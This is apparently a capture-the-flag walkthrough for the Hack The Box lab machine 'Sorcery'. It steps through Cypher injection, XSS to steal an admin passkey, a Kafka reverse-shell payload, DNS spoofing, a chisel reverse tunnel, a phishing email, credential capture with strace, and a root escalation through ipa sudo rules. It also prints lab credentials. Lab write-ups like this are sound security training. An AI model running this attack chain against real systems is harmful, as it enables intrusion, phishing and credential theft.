Run nmap:
nmap -T4 -vv -sC -sV -oN nmap/intial 10.129.161.83Discovered open ports:
22/tcp -> SSH (OpenSSH 9.6p1) 443/tcp -> HTTPS (nginx/1.27.1) Step 2: Web EnumerationAccess main website:
https://sorcery.htb/auth/loginDiscover Git server:
https://git.sorcery.htbClone repository:
GIT_SSL_NO_VERIFY=true git clone https://git.sorcery.htb/nicole_sullivan/infrastructure.git Step 3: Register UserRegister at:
https://sorcery.htb/auth/register Step 4: Cypher Injection for Registration KeyInject Cypher query to extract registration key:
https://sorcery.htb/dashboard/store/88b6b6c5...%2F%2FFound registration key:
dd05d743-b560-45dc-9a09-43ab18c7a513Register as seller using this key
Step 5: XSS to Extract Admin PasskeyAccess:
https://sorcery.htb/dashboard/new-productTrigger XSS to extract admin credentials
Step 6: Cypher Injection to Reset Admin PasswordInject payload:
https://sorcery.htb/dashboard/store/...%2F%2FAdmin password set to:
haxforums Step 7: Login with Passkey Use WebDevAuthn extension Login using Passkey: admin Step 8: Kafka ExploitationSetup Kafka via docker-compose
Extract topic from main.rs: update
Send reverse shell payload via Kafka:
python3 exploit_kafka.pyMonitor traffic in Wireshark (Loopback)
Step 9: DNS SpoofingModify /dns/hosts-user
echo '10.10.15.11 pain.sorcery.htb' >> /dns/hosts-user ./convert.sh pkill -9 dnsmasq Step 10: Chisel Tunnel for ProxyServe chisel binary:
python3 -m http.server 80Start client:
./chisel client 10.10.15.11:5555 R:socksStart server:
./chisel_arm server --port 5555 --reverse --socks5 Step 11: Download RootCA and Sign CertificateUse proxychains to download RootCA:
curl ftp://172.19.0.2/pub/RootCA.key curl ftp://172.19.0.2/pub/RootCA.crtSign cert and start mitmproxy:
mitmproxy --mode reverse:https://git.sorcery.htb ... Step 12: Phishing via MailSend phishing mail to tom_summers
swaks --to [email protected] --data "..."Retrieve credentials:
tom_summers : jNsMKQ6k2.XDMPu. Step 13: Extract Screenshot & OCRGet screen dump:
wget http://10.10.11.71:2004/Xvfb_screen0 mv Xvfb_screen0 text.xwd convert text.xwd text.png tesseract text.png output cat output.txtFound creds:
tom_summers_admin : dWpuk7cesBjT- Step 14: Privilege Escalation with StraceRun trace.sh to monitor docker login
Trigger docker login:
sudo -u rebecca_smith /usr/bin/docker loginExtracted creds:
rebecca_smith : -7eAZDp9-f9mg Step 15: Use Proxy to Extract Docker BlobUse proxychains:
curl -u 'rebecca_smith:...' http://127.0.0.1:5000/...Found creds:
donna_adams : 3FEVPCT_c3xDH ash_winter : w@LoiU8Crmdep Step 16: Root PrivilegesSSH into ash_winter
Add to sudoers via ipa commands:
ipa group-add-member sysadmins --users=ash_winter ipa sudorule-add-user allow_sudo --users=ash_winter sudo /usr/bin/systemctl restart sssdBecome root:
sudo su cat /root/root.txt